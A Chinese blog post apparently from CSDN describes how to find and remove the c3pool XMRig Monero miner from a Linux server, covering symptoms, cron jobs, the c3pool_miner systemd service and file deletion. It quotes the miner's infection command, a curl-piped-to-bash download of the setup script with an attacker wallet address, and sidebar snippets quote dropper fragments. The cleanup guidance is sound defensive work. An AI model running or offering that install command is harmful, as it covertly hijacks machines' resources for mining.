【安全】查杀linux上c3pool挖矿病毒xmrig

最新推荐文章于 2024-10-09 17:42:05 发布
最新推荐文章于 2024-10-09 17:42:05 发布
阅读量1k 收藏 6
点赞数 13
文章标签: 安全 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A_991128a/article/details/139323200
版权

挖矿平台:猫池

病毒来源安装脚本

cat /root/c3pool/config.json

crontab -r
cd /root/c3pool

curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44SLpuV4U7gB6RNZMCweHxWug7b1YUir4jLr3RBaVX33QxjJdzzcMA2bvwo6P4i6AxZjzsh227W3SjodscE45xFD7iXuW12

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/3c09fcc5fdd5439b80a6cc9f7ea3a8b1.png)
旷池提供的卸载脚本

curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s

中毒现象

高cpu和高内存占用
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/6f61676fd46e43b7a86c338f54936be9.png)
kill -9 杀掉之后自动重启
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/434e4d66f1ab4dfb9b953053346cb755.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/f989b238696545ad928ab8bd24d26907.png)
进程ip:47.76.163.177 为美国IP,IP查询
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/d2397b1731804bd0aca0482b334a9c92.png)

查杀过程

查找病毒脚本位置find / -name xmrig
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/e7b90bc0076846c8b95e6dbe350b7636.png)

检查是否有相关的定时任务
crontab -l

如果有定时任务则删除掉
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/1b3e107776d844e1ac1a336162eb2a67.png)

find / -name cron* -type d
查找自启动服务

因为kill -9杀掉进程之后会立即重启,需找到自启动服务,禁用后删除

systemctl list-units --type=service

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/47798d2ae8be4d409918f0e8bc998b63.png)

find / -name c3pool_miner.service

找到所有相关的服务,全部删除

# 关闭自启动
systemctl disable c3pool_miner.service
# 停止服务
systemctl stop c3pool_miner.service
# 删除服务
rm -f /etc/systemd/system/c3pool_miner.service

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/75fca3435b7d451d8573979df31d2660.png)
最后将脚本文件删除

rm -rf /root/c3pool/

【安全】查杀linux上c3pool挖矿病毒xmrig
【安全】查杀linux挖矿病毒
kswapd0
【安全】查杀linux隐藏挖矿病毒rcu_tasked
【安全】挖矿木马自助清理手册

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

教IT的小王A
关注
线上服务器突然崩了!?Jenkins 服务器中挖坑病毒解决方案
01-09
作者:一盏烛光,贤牛特邀工程师。 防伪码:三十功名尘与土,八千里路云和月。 公元 2020/04/16 4:38 分,登录线上服务器,执行 top 命令执行,发现已经崩了… 我们的 Jenkins 数据是从广州研发部 copy 过来的,包括 job 和 plugins 目录,和广州确定了,下图三个项目和他们无关。 查看控制台构建输出日志,发现直接把 CPU 搞崩了 然后看这个莫名其妙的未知项目,发现里面有脚本配置: #!/bin/bash if [[ $(whoami) != root ]]; then for tr in $(ps -U $(whoami) | egrep
服务器病毒,侵占CPU资源
Climber4211的博客
08-20 1273
以下是我从服务器中的病毒里找到的一个文件,从中学到不少知识,现在将这个病毒分析一下,本人只是一个开发,服务器被这个病毒侵占CPU挖矿,没办法,只能研究这个病毒,看怎么让我的服务器访问速度快点。 具体的讲解我也是看到了别人的文章,挂出来 第一篇文章 第二篇感觉讲的很详细 这个病毒最主要的表现是CPU 被占用,自己的服务打开速度奇慢,甚至打不开 #!/bin/bash SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin setenforce 0 2>/d
记录linux zigw挖矿病毒查杀
guanzhengyinqin的博客
01-27 1402
关于此病毒的参考文献: https://4hou.win/wordpress/?spm=a2c4e.11153940.blogcont657476.14.53ff2757GtnJxj&cat=6270 病毒介绍 https://yq.aliyun.com/articles/657476 病毒清理,不过有时会复发 https://blog.csdn.net/sayWhat_sayHello/...
安全查杀linux挖矿病毒 kswapd0
飞的博客
04-11 2511
按照腾讯云报道,此次攻击为“亡命徒(Outlaw)僵尸网络”该僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。高cpu占用,使用top命令查看cpu使用率长时间50%以上,cpu占用异常的进程八成就是挖矿病毒进程。此病毒隐藏了自己,top命令无法查看到挖矿病毒进程,可通过sysdig命令找到隐藏进程。注意,该进程有子进程spamd child,需要一同清理,否则会再次重启。同时检查如下目录,将可疑文件清理掉。
清理linuxc3pool挖矿病毒xmrig
sulei627719296的博客
04-25 1184
因为kill -9杀掉进程之后会立即重启,需找到自启动服务,禁用后删除。检查是否有相关的定时任务,如果有定时任务则删除掉。找到所有相关的服务,全部删除。
Linux服务器挖矿病毒处理
自己在学习过程中的总结
06-19 2410
情况说明:挖矿进程被隐藏(CPU占用50%,htop/top却看不到异常进程),结束挖矿进程后马上又会运行起来(crontab -l查看发现没有定时任务)。1.中毒表现 2.解决办法:断网并修改root密码,找出隐藏的挖矿进程,关闭病毒启动服务,杀掉挖矿进程 3. 防止黑客再次入侵:查找异常IP,封禁异常IP,查看是否有陌生公钥。中毒表现:服务器是24核的,前12核的CPU占用一直处于100%,即使重启服务器,马上就会占用12核的CPU,并且系统内存占用也很大。在没有使用软件的情况下,CPU使用率很高。
最新挖矿病毒xmrig清除方法和原理
m0_73140589的博客
03-21 4329
手机端接收短信提醒,服务器正遭受挖矿病毒攻击,服务器的cpu和内存占用高,阿里云不断告警
lifecalendarworm蠕虫病毒 Life Calendar查杀 蠕虫查杀 蠕虫病毒查杀 挖矿蠕虫查杀工具
03-09
lifecalendarworm挖矿蠕虫查杀工具 内含三款病毒查杀工具,都是国外知名软件,国内软件就不推荐了 Lifecalendarworm是一种恶意软件,也被称为"Life Calendar"或"LimeRAT",它是一种后门蠕虫,可以允许攻击者远程...
Linux挖矿病毒清理流程
热门推荐
ouxx2009的专栏
03-14 1万+
Linux挖矿病毒清理流程 1.前言: 根据阿里云快讯病毒公布: Redis RCE导致h2Miner蠕虫病毒,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。在以往常见的攻击者或蠕虫中,其大多都沿用登陆redis后写入定时任务或写ssh key的方式进行入侵,这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis加载module的攻击方式,可以直接执行任意指令或拿到shell交互环境,危害
博客被挖矿程序xmrig入侵以及我的解决方案(docker安全)
马赛琦的博客
09-03 8266
文章记录了一次由于Docker配置的漏洞导致的挖矿程序入侵的发现过程以及解决方案。由于本人时间有限,没有时间去深度学习linux的相关运维知识,所以解决方案可能是比较浅显的,还望您在阅读本文前知悉。 前言 2019年9月2日凌晨,我正准备关闭电脑睡觉,突然收到阿里云的一条短信,说是服务器被挖矿软件入侵了,一开始我是不相信的,就我这草履虫一样的网站,应该没有任何会来才对啊,后来查看了一下阿里云后...
linux 中毒 挖矿病毒,占用大量cpu,杀毒过程
lg4546的专栏
07-19 779
linux 挖矿病毒 , cpu 占用比较大 lVlgd 进程 , crontab 定时执行
Linux服务器挖矿木马病毒查杀记录(-bash mcrond bprofr pwnrig ntpdate dbused sysdr)
最新发布
jackhanyuan的博客
10-09 1296
近期,服务器异常,通过htop或top命令查看CPU占用前几的进程,发现root用户的-bash进程把CPU一半的核占满,而另一台服务器上x用户(被新创建的用户)和一个普通用户CPU占用也异常。杀掉进程后立马又启动了新进程,查看PID目录,可以看到exe指向了一个被删除了的-bash进程(/usr/bin/-bash),使用查看State为的网络连接,发现有异常外网连接这应该就是-bash病毒木马了。
Linux服务器挖矿病毒彻底清除与防护实操指南
boydoy1987的专栏
08-07 1166
Linux服务器在遭受挖矿病毒攻击时,会严重影响其性能和数据安全。本文将提供一套详细的操作步骤,结合实际案例,帮助您彻底清除Linux服务器上的挖矿病毒,并实施有效的防护措施。
Linux服务器防护+对抗挖矿病毒全流程探索
weixin_44197439的博客
09-09 978
服务器中了两次挖矿病毒,一次比一次厉害。在此记录一下杀毒全过程,为了永久解决这个问题,也寻找了常见的安全防护方法,为后来作参考。
根除矿机病毒xmrig
qq_19582693的博客
07-28 1623
根除xmrig矿机病毒
linux服务器彻底清除xmrig挖矿病毒
暴走地水牛的博客
06-02 4234
linux服务器上彻底清除xmrig挖矿病毒
Linux服务器xmrig病毒处理
weixin_44254869的博客
08-31 2023
第一次处理挖矿程序,针对以上问题,还是备份数据 格式化服务器吧,毕竟咱也不是专业的运维
如何快速发现linux系统有挖矿病毒
weixin_47450720的博客
03-17 3040
查看进程信息:使用ps命令查看系统的进程信息,查找到异常的进程,可以通过kill命令结束这些进程。使用系统监控工具:可以使用系统自带的top、htop等工具或第三方监控工具,查看系统的CPU、内存、网络等资源占用情况,如果发现异常占用情况,可能存在挖矿病毒。检查系统日志:查看系统日志文件,如/var/log/messages等文件,查找到异常日志信息,可以分析日志文件,确认是否存在挖矿病毒。要及时发现并清除挖矿病毒,需要经常监控系统的运行情况,及时发现异常情况,并结合多种手段进行分析和排查。
linux挖矿病毒查杀
09-10
查杀Linux挖矿病毒,首先需要识别病毒的特征。根据引用提供的信息,挖矿病毒Linux系统中的一个重要特征是...综上所述,查杀Linux挖矿病毒的方法包括检查异常的CPU占用率、检查DNS记录是否被修改、停止计划任务等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值